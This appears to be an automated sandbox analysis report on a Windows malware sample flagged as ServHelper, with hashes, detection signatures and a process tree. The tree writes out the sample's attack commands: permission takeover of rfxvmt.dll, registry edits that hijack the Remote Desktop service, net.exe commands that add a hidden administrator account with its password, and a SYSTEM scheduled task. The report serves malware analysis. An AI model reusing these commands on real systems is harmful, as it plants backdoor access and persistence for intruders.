Analysis
-
max time kernel
78s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
01-07-2022 14:14
Static task
static1
Behavioral task
behavioral1
Sample
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
Resource
win10v2004-20220414-en
General
-
Target
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
-
Size
2.9MB
-
MD5
cc47bc788a58c510b00a5b288769a943
-
SHA1
184478b1e91d3354f5981c19e615bec766c38fab
-
SHA256
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e
-
SHA512
ddf966d08c8de80ff86f222a4b794d9b0afeb3a1c88070452d086a3e61b8e8c0d65b40afbd2c28f1c0ca9d8f3947a1d9d485177290e0a745091908337dd0e1e6
Malware Config
Signatures
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1652 takeown.exe 1876 icacls.exe 3360 icacls.exe 904 icacls.exe 2352 icacls.exe 4624 icacls.exe 3524 icacls.exe 4120 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "%SystemRoot%\\help\\tmp5211.dat" reg.exe -
Processes:
resource yara_rule C:\Windows\Help\tmp5212.dat upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe -
Loads dropped DLL 7 IoCs
Processes:
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exepid process 4108 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe 4108 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe 4108 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe 4108 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe 4108 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe 4932 4932 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1652 takeown.exe 1876 icacls.exe 3360 icacls.exe 904 icacls.exe 2352 icacls.exe 4624 icacls.exe 3524 icacls.exe 4120 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 3 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\help\tmp5211.dat powershell.exe File created C:\Windows\help\tmp5212.dat powershell.exe File created C:\Windows\help\tmp5213.dat powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 3204 powershell.exe 3204 powershell.exe 3204 powershell.exe 3204 powershell.exe 3204 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 648 648 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeicacls.exedescription pid process Token: SeDebugPrivilege 3204 powershell.exe Token: SeRestorePrivilege 3360 icacls.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.execmd.exepowershell.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 4108 wrote to memory of 2188 4108 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe cmd.exe PID 4108 wrote to memory of 2188 4108 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe cmd.exe PID 2188 wrote to memory of 3204 2188 cmd.exe powershell.exe PID 2188 wrote to memory of 3204 2188 cmd.exe powershell.exe PID 3204 wrote to memory of 1652 3204 powershell.exe takeown.exe PID 3204 wrote to memory of 1652 3204 powershell.exe takeown.exe PID 3204 wrote to memory of 1876 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 1876 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 3360 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 3360 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 904 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 904 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 2352 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 2352 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 4624 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 4624 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 3524 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 3524 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 4120 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 4120 3204 powershell.exe icacls.exe PID 3204 wrote to memory of 4608 3204 powershell.exe reg.exe PID 3204 wrote to memory of 4608 3204 powershell.exe reg.exe PID 3204 wrote to memory of 1500 3204 powershell.exe reg.exe PID 3204 wrote to memory of 1500 3204 powershell.exe reg.exe PID 3204 wrote to memory of 1616 3204 powershell.exe net.exe PID 3204 wrote to memory of 1616 3204 powershell.exe net.exe PID 1616 wrote to memory of 4820 1616 net.exe net1.exe PID 1616 wrote to memory of 4820 1616 net.exe net1.exe PID 2452 wrote to memory of 4140 2452 cmd.exe net.exe PID 2452 wrote to memory of 4140 2452 cmd.exe net.exe PID 4140 wrote to memory of 4700 4140 net.exe net1.exe PID 4140 wrote to memory of 4700 4140 net.exe net1.exe PID 3204 wrote to memory of 4928 3204 powershell.exe cmd.exe PID 3204 wrote to memory of 4928 3204 powershell.exe cmd.exe PID 3204 wrote to memory of 2448 3204 powershell.exe cmd.exe PID 3204 wrote to memory of 2448 3204 powershell.exe cmd.exe PID 1488 wrote to memory of 5020 1488 cmd.exe net.exe PID 1488 wrote to memory of 5020 1488 cmd.exe net.exe PID 5020 wrote to memory of 4920 5020 net.exe net1.exe PID 5020 wrote to memory of 4920 5020 net.exe net1.exe PID 2604 wrote to memory of 1360 2604 cmd.exe net.exe PID 2604 wrote to memory of 1360 2604 cmd.exe net.exe PID 1360 wrote to memory of 1484 1360 net.exe net1.exe PID 1360 wrote to memory of 1484 1360 net.exe net1.exe PID 876 wrote to memory of 376 876 cmd.exe net.exe PID 876 wrote to memory of 376 876 cmd.exe net.exe PID 376 wrote to memory of 4072 376 net.exe net1.exe PID 376 wrote to memory of 4072 376 net.exe net1.exe PID 2220 wrote to memory of 1148 2220 cmd.exe net.exe PID 2220 wrote to memory of 1148 2220 cmd.exe net.exe PID 1148 wrote to memory of 3980 1148 net.exe net1.exe PID 1148 wrote to memory of 3980 1148 net.exe net1.exe PID 612 wrote to memory of 4568 612 cmd.exe net.exe PID 612 wrote to memory of 4568 612 cmd.exe net.exe PID 4568 wrote to memory of 3688 4568 net.exe net1.exe PID 4568 wrote to memory of 3688 4568 net.exe net1.exe PID 3580 wrote to memory of 4168 3580 cmd.exe schtasks.exe PID 3580 wrote to memory of 4168 3580 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe"C:\Users\Admin\AppData\Local\Temp\b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps13⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\tmp5211.dat /f4⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc ZfSH0CwA /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc ZfSH0CwA /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc ZfSH0CwA /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc ZfSH0CwA1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc ZfSH0CwA2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc ZfSH0CwA3⤵
-
C:\Windows\System32\cmd.execmd /C schtasks /create /tn 87383 /tr "powershell -nop -ep bypass -f c:\windows\help\79972.ps1" /ru system /sc hourly /mo 11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /tn 87383 /tr "powershell -nop -ep bypass -f c:\windows\help\79972.ps1" /ru system /sc hourly /mo 12⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps1Filesize
3.5MB
MD5fdd9a0a19257b291d81aef4d310e9cd4
SHA179fca0c2c1044c0382ee37158d3c993010f79afe
SHA256b842e422cea2540aa4d953b7940c18a6a5e23dabc933e979e9305b56cc3afd2e
SHA512bad901dcf7130ee315547313595d259a7954edaf7726d2d65a6412f56ca02d836f1f8cd86ba562d34654e286d6efbc901369be6cbae03cdea027bfa07006a7e2
-
C:\Users\Admin\AppData\Local\Temp\changes_7521tg.txtFilesize
102B
MD57575fd92dd722a9f8eb4d7efce5e0a5f
SHA17773366c9157ac9be5247c45177ea2d7b7daf86b
SHA2566d6623e881557bf3874f34aeff1d81e4b28aa19f408c43a162a9432ad75f6e9b
SHA5127a50c77308c543886e7fa91149b39e3b0fd7de3b163d275dac03457c7ac4ce63adf4c8f0d22c59ceaae1e34a7eb6677461aad4081e7988502e85e142d0e6065c
-
C:\Users\Admin\AppData\Local\Temp\nsbD72C.tmp\System.dllFilesize
11KB
MD5fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
C:\Users\Admin\AppData\Local\Temp\nsbD72C.tmp\blowfish.dllFilesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
C:\Users\Admin\AppData\Local\Temp\nsbD72C.tmp\blowfish.dllFilesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
C:\Users\Admin\AppData\Local\Temp\nsbD72C.tmp\blowfish.dllFilesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
C:\Users\Admin\AppData\Local\Temp\nsbD72C.tmp\blowfish.dllFilesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
C:\Windows\Help\tmp5211.datFilesize
116KB
MD561de3d9dc03ed2a1d688e1425b52cfda
SHA168694949cbbba5f21515f6ef762356d20541f03c
SHA256cd32a60b92378244fdd4ad85965effac0a9ed538d43b9b06ee7e91c6c2a9a2a9
SHA5129138691813e976dacfc04336325d38236a66f8a3d1848c449a0ec29918cc4d21efd3ec33e39d87006302c10e821a132f2d1ef847dcfe1e2e6a4c132fd9762545
-
C:\Windows\Help\tmp5212.datFilesize
784KB
MD572f5170b8b6951ed93d6653bba6b17c1
SHA1baadfbc7fe2b2e9c87faddb2d161fa162627828d
SHA256d9a7b6d13f5a6f217a6f3e213b95a582d11a6fd93174ec4096892f0d7805e1b8
SHA512ad874d06546bb3948024a5456e97adbfd42a2a11b2aeba914cc89752ed778e6fa276bdf2be2d728f95e3accac07067e80488979a97b82581c9adafeac7c4cd69
-
C:\Windows\system32\rfxvmt.dllFilesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
memory/376-167-0x0000000000000000-mapping.dmp
-
memory/904-147-0x0000000000000000-mapping.dmp
-
memory/1148-169-0x0000000000000000-mapping.dmp
-
memory/1360-165-0x0000000000000000-mapping.dmp
-
memory/1484-166-0x0000000000000000-mapping.dmp
-
memory/1500-153-0x0000000000000000-mapping.dmp
-
memory/1616-154-0x0000000000000000-mapping.dmp
-
memory/1652-143-0x0000000000000000-mapping.dmp
-
memory/1876-145-0x0000000000000000-mapping.dmp
-
memory/2188-137-0x0000000000000000-mapping.dmp
-
memory/2352-148-0x0000000000000000-mapping.dmp
-
memory/2448-162-0x0000000000000000-mapping.dmp
-
memory/3204-142-0x00007FFCC2620000-0x00007FFCC30E1000-memory.dmpFilesize
10.8MB
-
memory/3204-173-0x00007FFCC2620000-0x00007FFCC30E1000-memory.dmpFilesize
10.8MB
-
memory/3204-138-0x0000000000000000-mapping.dmp
-
memory/3204-139-0x00000282F12E0000-0x00000282F1302000-memory.dmpFilesize
136KB
-
memory/3204-141-0x00007FFCC2620000-0x00007FFCC30E1000-memory.dmpFilesize
10.8MB
-
memory/3360-146-0x0000000000000000-mapping.dmp
-
memory/3524-150-0x0000000000000000-mapping.dmp
-
memory/3688-172-0x0000000000000000-mapping.dmp
-
memory/3980-170-0x0000000000000000-mapping.dmp
-
memory/4072-168-0x0000000000000000-mapping.dmp
-
memory/4108-132-0x0000000002861000-0x0000000002865000-memory.dmpFilesize
16KB
-
memory/4120-151-0x0000000000000000-mapping.dmp
-
memory/4140-158-0x0000000000000000-mapping.dmp
-
memory/4168-174-0x0000000000000000-mapping.dmp
-
memory/4568-171-0x0000000000000000-mapping.dmp
-
memory/4608-152-0x0000000000000000-mapping.dmp
-
memory/4624-149-0x0000000000000000-mapping.dmp
-
memory/4700-159-0x0000000000000000-mapping.dmp
-
memory/4820-155-0x0000000000000000-mapping.dmp
-
memory/4920-164-0x0000000000000000-mapping.dmp
-
memory/4928-161-0x0000000000000000-mapping.dmp
-
memory/5020-163-0x0000000000000000-mapping.dmp